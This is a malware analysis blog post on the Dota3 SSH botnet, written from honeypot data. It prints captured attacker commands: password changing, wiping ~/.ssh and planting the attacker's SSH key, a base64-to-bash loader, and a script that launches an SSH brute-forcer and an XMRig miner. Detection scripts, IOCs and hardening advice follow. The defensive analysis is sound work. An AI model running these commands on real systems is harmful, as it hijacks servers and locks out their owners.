Dota3 Malware Again and Again

The Internet is full of automated systems that hunt for servers with weak credentials and infect them with malware. In this post we analyze a well-known family that has been active for years: Dota. Several variants have appeared over time, and data collected by one of our Internet-facing servers shows that Dota3, the latest variant, is still active.

Dota3

Dota3 is a member of the Dota family: a botnet that goes after weak SSH servers with dictionaries of default and common credentials.

Once a login succeeds, the bot runs a series of commands to profile the compromised system: number of CPU cores and CPU model, memory, logged-in users, running processes, cron jobs and architecture. It also changes the account password by piping the current password (ubuntu123 below) and a random new one into passwd, and appends that command line to up.txt so the new credential is not lost; the same file is later handed to the scanner. Finally, to keep access, it deletes the user's existing ~/.ssh directory (taking any legitimate keys and known_hosts with it), recreates it with its own ssh-rsa key in authorized_keys, and sets the permissions sshd requires (chmod -R go= ~/.ssh).

cat /proc/cpuinfo | grep name | wc -l
'echo -e "ubuntu123\nN2a96PU0mBfS\nN2a96PU0mBfS"|passwd|bash' >> up.txt
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
crontab -l 
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname -a
lscpu | grep Model
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

 

Immediately afterwards they upload a file called dota3.tar.gz to /var/tmp on the compromised host via SFTP and run the following command, which base64-decodes a script and pipes it straight into bash to set up the actor's malware:

echo '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' | base64 --decode | bash

 

It is a script that first changes into /tmp and removes a set of hidden directories left by earlier infections, in case the server had been compromised before (the .ssh removed here is /tmp/.ssh, not the user's ~/.ssh):

rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*

 

Then it creates a hidden directory /tmp/.X26-unix and moves into it, tries to unzip an X26-unix.zip that is not among the files described in this post, moves the dota3.tar.gz uploaded in the previous step from /var/tmp into the directory and untars it:

unzip X26-unix.zip
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz

 

Finally, after short delays, the script starts the actor's scanner and the miner. The binary tsm is launched twice with port 22, a credentials file (/tmp/up.txt, the file from the password step) and an address prefix as arguments, which makes it the SSH brute-forcer; the prefixes used here, 192.168 and 172.16, are private address space, so this first pass sweeps the victim's local network rather than the Internet. Twenty minutes later initall is run, the part that initializes XMRig:

sleep 3s && cd /tmp/.X26-unix/.rsync/c
nohup /tmp/.X26-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X26-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X26-unix/.rsync/initall 2>1&

 

Here is the whole script decoded. Note the 2>1& on the background commands: that is not 2>&1, so each command's stderr goes to a file literally named 1 in the working directory instead of being discarded.

#!/bin/bash
cd /tmp 
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X26-unix
cd .X26-unix
unzip X26-unix.zip
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X26-unix/.rsync/c
nohup /tmp/.X26-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X26-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X26-unix/.rsync/initall 2>1&
exit 0
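
The commands above give a defender a concrete checklist: the attacker's public key in authorized_keys, the hidden /tmp/.X*-unix tree, /tmp/up.txt, the archive in /var/tmp, processes running out of the hidden directory, and the file hashes listed further down. The script below is an added triage example written for this post, not code from CounterCraft or from the malware; paths and the key fragment are taken from the captured commands, while the /proc-based process check, the choice of hash subset and the root-directory parameter (so it can be run against a mounted image) are my own additions.

```shell
#!/bin/sh
# Added triage script (not from the CounterCraft post): looks for the Dota3
# artefacts described above on a live host or a mounted image. Paths and the key
# fragment come from the post; the /proc process check and the hash subset are
# my additions. Usage: sh dota3_triage.sh /   or   sh dota3_triage.sh /mnt/image

# First part of the base64 blob of the attacker's ssh-rsa key (from the
# authorized_keys command above). Matching the blob rather than the "mdrfckr"
# comment still works if the comment is edited.
DOTA3_KEY_FRAGMENT='AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1'

# Subset of the SHA-256 IOCs listed in the post: dota3.tar.gz, init, initall,
# c/a, c/run, c/sshd. The empty-file hash given for c/v is deliberately left out.
DOTA3_SHA256='
a1747edddcf4f9807effc4bbca21df11694bc313761a0135293d2339d38f7677
6c3990e72e13938828aca0c02d4c098dee3fc1b31c28b0fd229d7bf7ffca0f28
befdf0be5b811621a72eddafad1886321102be1ec3417030888371c5554d9d1a
6f44d32649344da4aad485abb95579f708d79b184a61160b25f688c6e7cbb3b4
997803d379b42bc2913b5a93cff09f544583b7eac313d66c7602cbc8f2b310b5
4c68f638b2d30615e7e8e2a9ef04fcc6f9b18cb0616430b2e0461f8946f900a2
'

# Normalise ROOT ("" or "/" for the live host, "/mnt/image" for an image) so
# that "$root/tmp" never produces a double slash.
dota3_root() {
    local r="${1:-/}"
    printf '%s' "${r%/}"
}

# SHA-256 of a file via coreutils, or shasum where sha256sum is absent.
dota3_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi | cut -d' ' -f1
}

# KEY: authorized_keys files (root and every /home user) holding the attacker key.
dota3_check_keys() {
    local root f
    root=$(dota3_root "$1")
    for f in "$root/root/.ssh/authorized_keys" "$root"/home/*/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        if grep -qF "$DOTA3_KEY_FRAGMENT" "$f" 2>/dev/null; then echo "KEY $f"; fi
    done
    return 0
}

# DIR/FILE: the hidden directories the script removes or creates under /tmp,
# the credential note up.txt and the uploaded archive in /var/tmp.
dota3_check_files() {
    local root d f
    root=$(dota3_root "$1")
    for d in "$root"/tmp/.X*-unix "$root/tmp/.mountfs"; do
        if [ -d "$d" ]; then echo "DIR $d"; fi
    done
    for f in "$root/tmp/up.txt" "$root/var/tmp/dota3.tar.gz"; do
        if [ -f "$f" ]; then echo "FILE $f"; fi
    done
    return 0
}

# PROC: running processes whose executable lives under a hidden /tmp/.X*-unix
# tree, as tsm and initall do. Reads /proc/<pid>/exe links directly, so it does
# not depend on ps, and a test can point ROOT at a fake /proc.
dota3_check_procs() {
    local root p exe
    root=$(dota3_root "$1")
    for p in "$root"/proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            /tmp/.X*-unix/*) echo "PROC ${p##*/} $exe" ;;
        esac
    done
    return 0
}

# HASH: files in the payload tree (and the archive) whose SHA-256 is a known IOC.
dota3_check_hashes() {
    local root f h
    root=$(dota3_root "$1")
    {
        if [ -f "$root/var/tmp/dota3.tar.gz" ]; then echo "$root/var/tmp/dota3.tar.gz"; fi
        find "$root"/tmp/.X*-unix -type f 2>/dev/null
    } | while IFS= read -r f; do
        h=$(dota3_sha256 "$f") || continue
        [ -n "$h" ] || continue
        case "$DOTA3_SHA256" in
            *"$h"*) echo "HASH $f $h" ;;
        esac
    done
    return 0
}

# One line per finding; prints nothing on a clean host.
dota3_triage() {
    local root
    root=$(dota3_root "$1")
    dota3_check_keys "$root"
    dota3_check_files "$root"
    dota3_check_procs "$root"
    dota3_check_hashes "$root"
}

if [ $# -gt 0 ]; then
    findings=$(dota3_triage "$1")
    if [ -n "$findings" ]; then printf '%s\n' "$findings"; exit 1; fi
    echo "no Dota3 indicators found under $1"
fi
```

Run it as root so that /root/.ssh and every /proc/<pid>/exe are readable; against a mounted image the PROC check naturally finds nothing. A missing or freshly recreated ~/.ssh on a server whose admin had keys there is itself worth a second look, since the attacker wipes that directory before dropping its own key.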

MITRE ATT&CK Techniques

Cataloguing the actor's TTPs with the MITRE ATT&CK matrix helps teams mitigate risk and stop attacks. These are the MITRE ATT&CK techniques observed in CC0631's behavior:

Automatic TTP capturing from CounterCraft’s Deception Platform

Command and Scripting Interpreter – Unix Shell (T1059.004): attackers abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh…) depending on the specific distribution.

System Service Discovery (T1007): attackers try to get information about registered services, using operating system utilities to list them. (Note that the profiling commands captured above, uname, lscpu, free, w and crontab -l, fall under System Information Discovery, T1082, which is worth tagging alongside T1007.)

Account Manipulation – SSH Authorized Keys (T1098.004): attackers modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of ssh sessions for remote management.

Indicator Removal on Host – File Deletion (T1070.004): attackers delete files left behind by their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how.

Resource Hijacking (T1496): attackers leverage the resources of co-opted systems to solve resource-intensive problems, which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency; the XMRig miner started by initall is exactly this.

 

IOCs

Filename      Filepath                            SHA-256
dota3.tar.gz  /var/tmp/dota3.tar.gz               a1747edddcf4f9807effc4bbca21df11694bc313761a0135293d2339d38f7677
1             /tmp/.X26-unix/.rsync/1             5c30e26438b16a05c04502633d4769f7b01fa033a30da1c42d03f45dd60bbcd1
init          /tmp/.X26-unix/.rsync/init          6c3990e72e13938828aca0c02d4c098dee3fc1b31c28b0fd229d7bf7ffca0f28
init2         /tmp/.X26-unix/.rsync/init2         eb019aecd3f4b0f0d94d26c576e323cc7c2331e59087e8aa2478aa72b36563eb
initall       /tmp/.X26-unix/.rsync/initall       befdf0be5b811621a72eddafad1886321102be1ec3417030888371c5554d9d1a
dir.dir       /tmp/.X26-unix/.rsync/dir.dir       e0646376ba022eef311d67907ff0214df7db1396134a6ccfd182d448e7f18f62
a             /tmp/.X26-unix/.rsync/a/a           9d4fef06b12d18385f1c45dd4e37f031c6590b080ea5446ff7a5bac491daea50
cron          /tmp/.X26-unix/.rsync/a/cron        59eb24690f25be9e349e3e1e4cd51ed6add1f5874111e5bc5b436ee93fe7e0d9
init0         /tmp/.X26-unix/.rsync/a/init0       99def4ea5caa774f4c090f9b44d96c56735a0970b60e18a57386ad55542cdfa4
run           /tmp/.X26-unix/.rsync/a/run         3e00ba1fdc57a87156e30cd896b908fc3f1775bb5ffd411c027ae519fc42c330
stop          /tmp/.X26-unix/.rsync/a/stop        c047dffd230ab103f2cb0377918575b20be34a4f3de3b2c8be0821ceb47de157
a             /tmp/.X26-unix/.rsync/b/a           dc43fdfbb5f7e8ecc80353dcd85889c0c08483c99acbce35b3ed8f399c936920
run           /tmp/.X26-unix/.rsync/b/run         38c6728331722a081493464ca2d890b7b07358fdfdf1fb7f04f690173b296966
stop          /tmp/.X26-unix/.rsync/b/stop        c3b5118e534ee34639e438670695ba9e93db918d7d3160a302cef0a14a10e3b1
a             /tmp/.X26-unix/.rsync/c/a           6f44d32649344da4aad485abb95579f708d79b184a61160b25f688c6e7cbb3b4
aptitude      /tmp/.X26-unix/.rsync/c/aptitude    dce6df3c84f02f37900d61a13e3358af98e05193c1142bc9784ab15ab97a2e6a
b             /tmp/.X26-unix/.rsync/c/b           b82838c66b0516a89674640c999970507b59a69945465edcc1c9125295ce47d4
dir.dir       /tmp/.X26-unix/.rsync/c/dir.dir     89812d2d7b09e5136ed9217eb4df86b6d5a295cbc92324b721a0d06ad3eca69d
go            /tmp/.X26-unix/.rsync/c/go          b0ea5caa1ad79b799a2f23dd17d9c575901c868026615d56f31e6738809a9655
golan         /tmp/.X26-unix/.rsync/c/golan       1cc9c6a2c0f2f41900c345b0216023ed51d4e782ed61ed5e39eb423fb2f1ddd8
ip            /tmp/.X26-unix/.rsync/c/ip          449ec4d688b15fcb6cf3d4e8b90e905dfd225bc8ec2c3f1cc134af405876a8d9
n             /tmp/.X26-unix/.rsync/c/n           4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
p             /tmp/.X26-unix/.rsync/c/p           ec668dc65c802b271e4f0caa4148538aa293eab8998e27e7c617c6bef4d749c2
run           /tmp/.X26-unix/.rsync/c/run         997803d379b42bc2913b5a93cff09f544583b7eac313d66c7602cbc8f2b310b5
slow          /tmp/.X26-unix/.rsync/c/slow        b92e77fdc4aa3181ed62b2d0e58298f51f2993321580c8d2e3368ef8d6944364
sshd          /tmp/.X26-unix/.rsync/c/sshd        4c68f638b2d30615e7e8e2a9ef04fcc6f9b18cb0616430b2e0461f8946f900a2
start         /tmp/.X26-unix/.rsync/c/start       9dbbc9b5d7793425968e42e995226c5f9fe32e502a0a694320a5e838d57c8836
stop          /tmp/.X26-unix/.rsync/c/stop        e431d806f4ded2c8f77da603e2d7e89c5fbef9a5e0c732b561dccca721efdb2d
v             /tmp/.X26-unix/.rsync/c/v           e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
watchdog      /tmp/.X26-unix/.rsync/c/watchdog    f95c1c076b2d78834cc62edd2f4c4f2f6bfa21d07d07853274805859e20261ba

Two of these hashes should not be used as indicators on their own: e3b0c442… (c/v) is the SHA-256 of an empty file, and 4355a46b… (c/n) is the SHA-256 of a file containing just the character 1 followed by a newline, so both will match countless unrelated files. Note also that tsm, the scanner the script launches from /tmp/.X26-unix/.rsync/c, is not among the files listed above; the directory path and the authorized_keys entry are the more reliable tells.

Conclusion

Over the last few years the layout of the files this actor drops has changed, but as we have seen the variant itself has changed little. The goal is the same: break into a server with weak credentials, gain persistence by adding a key to authorized_keys, install XMRig and a scanner that goes looking for further victims. The best defense against this kind of actor is to secure the SSH service itself:

  • Only allow SSH inbound connections from specific remote IP addresses.
  • Disable password authentication (PasswordAuthentication no) and use key-based authentication, which takes the dictionary attack off the table entirely.
  • Do not allow root to log in with a password (PermitRootLogin no or prohibit-password).
  • Watch ~/.ssh/authorized_keys for keys you did not add and /tmp for hidden directories such as .X26-unix; the key comment mdrfckr and the path /tmp/.X26-unix/.rsync are the quickest tells of this variant.

These steps are still some of the best ways to prevent Dota malware and to keep systems secure.
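
The weak settings that let this dictionary attack succeed, and their hardened counterparts, can be checked mechanically. The script below is an added example written for this post, not CounterCraft's code: it reads an sshd_config the way sshd does (first value of a keyword wins, and anything after a Match line applies only inside that block) and flags password authentication, password root login, empty passwords and the absence of any AllowUsers/AllowGroups or Match Address restriction. The two sample configs are constructed for the example and 10.0.0.0/24 is a placeholder management network; Include directives are not followed, which is an assumption of this parser, so sshd -T remains the authoritative view of the effective configuration.

```shell
#!/bin/sh
# Added example (not from the post): audit an sshd_config for the settings that
# let a dictionary attack like Dota3's succeed, run against a constructed weak
# config and a constructed hardened one. Only directives with certain sshd
# defaults are checked: PasswordAuthentication (default yes), PermitRootLogin,
# PermitEmptyPasswords, plus whether AllowUsers/AllowGroups or a Match Address
# block restricts who may connect. Include directives are not followed
# (assumption: single-file config); "sshd -T" is the authoritative view.
# Usage: sh sshd_audit.sh /etc/ssh/sshd_config

# Effective global value of a directive. sshd uses the FIRST value it reads for a
# keyword, and lines after a Match only apply inside that block, so the scan
# stops at the first Match line. Prints nothing if the directive is not set.
sshd_effective() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        tolower($1) == "match"               { exit }
        tolower($1) == key                   { print $2; exit }
    ' "$1"
}

# Print one FINDING line per weak setting; prints nothing for a hardened file.
sshd_audit() {
    local f="$1" v
    v=$(sshd_effective "$f" PasswordAuthentication)
    if [ "${v:-yes}" = yes ]; then
        echo "FINDING $f: PasswordAuthentication=${v:-unset} (default yes: password guessing is possible)"
    fi
    v=$(sshd_effective "$f" PermitRootLogin)
    if [ "$v" = yes ]; then
        echo "FINDING $f: PermitRootLogin=yes (root reachable with a password)"
    fi
    v=$(sshd_effective "$f" PermitEmptyPasswords)
    if [ "$v" = yes ]; then
        echo "FINDING $f: PermitEmptyPasswords=yes"
    fi
    if [ -z "$(sshd_effective "$f" AllowUsers)$(sshd_effective "$f" AllowGroups)" ] &&
       ! grep -Eiq '^[[:space:]]*Match[[:space:]].*Address' "$f"; then
        echo "FINDING $f: no AllowUsers/AllowGroups or Match Address (any user from any address may try)"
    fi
    return 0
}

# Constructed sample configs (not taken from any real host), written into DIR.
sshd_write_samples() {
    cat > "$1/weak.conf" <<'EOF'
# Stock-looking sshd_config: everything Dota3's dictionary needs.
Port 22
PermitRootLogin yes
PasswordAuthentication yes
UsePAM yes
# A naive "last value wins" parser would see this and report passwords disabled;
# it only applies to the user "backup".
Match User backup
    PasswordAuthentication no
EOF
    cat > "$1/hardened.conf" <<'EOF'
# Key-only authentication, no root, one named user from one management
# network (10.0.0.0/24 is a placeholder for your own range).
Port 22
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitEmptyPasswords no
PubkeyAuthentication yes
AuthenticationMethods publickey
AllowUsers deploy@10.0.0.0/24
MaxAuthTries 3
LoginGraceTime 20
EOF
}

if [ $# -gt 0 ]; then
    sshd_audit "$1"
fi
```

Run sshd -t after editing to validate the syntax before restarting the daemon. The AllowUsers user@CIDR form restricts who may even attempt authentication, but sshd still answers on port 22 and the bot will keep burning attempts against it, so pair it with a host or network firewall rule that only admits the management range, which is the first bullet above.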

About the Author

John Requejo, integration engineer at CounterCraft, works tirelessly to attract attackers to the deception environment and also analyze their behavior. You can find him on LinkedIn.